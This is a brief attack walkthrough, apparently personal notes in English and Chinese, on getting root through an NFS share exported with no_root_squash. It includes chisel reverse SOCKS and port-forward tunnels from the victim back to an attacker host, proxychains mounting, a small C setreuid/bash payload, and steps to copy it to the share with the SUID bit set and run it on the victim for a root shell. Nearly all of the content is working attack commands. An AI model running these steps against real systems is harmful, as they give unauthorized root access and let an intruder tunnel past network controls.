NFS no_root_squash Remote Exploit (PrivEsc)

Port Scan

111/tcp  open  rpcbind 2-4 (RPC #100000)
2049/tcp open  nfs_acl 3 (RPC #100227)

Share Info(已登入到 Victim)

# Victim
# /etc/exports

/srv/Share 10.1.1.0/24(insecure,rw)
/srv/Share 127.0.0.1/32(no_root_squash,insecure,rw)


-bash-4.2$ ll /share 
drwxr-xr-x.  3 root root  19 Dec 21  2019 .   
dr-xr-xr-x. 17 root root 224 Dec 21  2019 .. 
drwxrwxrwx.  2 root root   6 Dec 21  2019 Me

-bash-4.2$ ll /share/Me
drwxrwxrwx. 2 root root  6 Dec 21  2019 .
drwxr-xr-x. 3 root root 19 Dec 21  2019 ..

Reverse Socks5 Proxy

# Attack
chisel server --host Attack -p 1234 --reverse
# 2020/11/17 21:25:41 server: Reverse tunnelling enabled
# 2020/11/17 21:25:41 server: Fingerprint aMM19G1w1a+3JHfkRi4oJAKMW/LTKQ9KCwDE7EYBGaE=
# 2020/11/17 21:25:41 server: Listening on http://Attack:1234
# 2020/11/17 21:27:38 server: session#2: tun: proxy#R:127.0.0.1:8888=>socks: Listening

# Victim
chisel client Attack:1234 R:8888:socks
# 2020/11/17 08:27:35 client: Connecting to ws://Attack:1234
# 2020/11/17 08:27:37 client: Connected (Latency 229.064705ms)

# Attack
# Proxychains4.conf
socks5 127.0.0.1 8888

Reverse Port forwarding

# Attack
chisel server --host Attack -p 1234 --reverse
# 2020/11/17 21:37:11 server: session#3: tun: proxy#R:2049=>2049: Listening

# Victim
chisel client Attack:1234 R:2049:127.0.0.1:2049

检查挂载信息

proxychains4 showmount -e Victim

# [proxychains] Strict chain  ...  127.0.0.1:8888  ...  Victim:111  ...  OK
# [proxychains] Strict chain  ...  127.0.0.1:8888  ...  Victim:20048  ...  OK
# Export list for Victim:
# /share/Me 127.0.0.1/32,Victim/24

Payload

// gcc -o payload payload.c

int main(void)
{
    setreuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

挂载 NFS Share 到 Attack

# Attack

mount -t nfs 127.0.0.1:/share/Me /tmp/nfs

复制到挂载目录并为 Payload 设置 SUID 权限

# Attack

cp ./payload /tmp/nfs/bash
chmod +s /tmp/nfs/bash

运行 Payload

# Victim
cd /share/Me

./bash -p

Links & Resources

• NFS no_root_squash/no_all_squash misconfiguration PE